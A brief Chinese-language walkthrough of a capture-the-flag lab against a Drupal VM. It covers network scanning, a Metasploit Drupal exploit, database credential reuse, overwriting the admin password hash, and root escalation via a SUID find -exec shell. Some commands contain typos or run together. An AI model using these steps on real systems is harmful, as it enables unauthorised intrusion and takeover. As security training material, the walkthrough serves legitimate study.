首先打开设置都切换成NAT模式
然后改为root权限
使用 arp-scan 进行内网探测主机 arp-scan -l
其中我的192.168.124.131为靶机IP
探测网段内所有主机是否开启端口 nmap -sV -p 22,23,3306,80 192.168.124.131/24
进入浏览器搜索 发现Drupal 框架,然后用 msf 工具进行攻击:msfconsole
寻找相关模块 search drupal 优先使用Rank高的模块 这里是使用1
设置相关参数 set RHOST 192.168.124.131(靶机地址)
拿到第一个flag 用cat命令打印出flag1内容 然后根据提示去找配置文件 配置/查看后出现flag2
发现连接数据库的用户名和口令 数据库为mysql
拿到数据库登录用的用户名和口令:
python -c "import pty;pty.spawn( '/bin/bash')"
然后登录:mysql –u dbuser –p 密码: R0ck3t
登录成功查看相关信息:show databases;use drupaldb; select * from users;发现用户名及密码hash值
更改admin登录口令查看所有带有pass的文件:find / -name "*pass*"查看文件:cat /var/www/scripts/password-hash.sh设置密码为:php scripts/password-hash.sh 123456
更新数据库admin口令
update users set pass="$S$D38o/6Z0AKdbU2T3EM0qOaiGN8UyKK6V/5oXQETlRf4ZfLgaf8UV" where uid=1;
然后就可以去浏览器登录 admin//123456 点击Dashboard后发现flag3
输入命令:cat /etc/passwd, 发现flag4
查找flag文件,输入命令:find / -name "*flag*"
查找具有root权限的SUID的文件,输入命令:find / -perm -u=s -type f 2>/dev/nul
find / -name 775 -exec "/bin/sh" \;用-exec去替换权限
将find的root权限换成自己的:touch 775find / -name 775 -exec "whoami" \;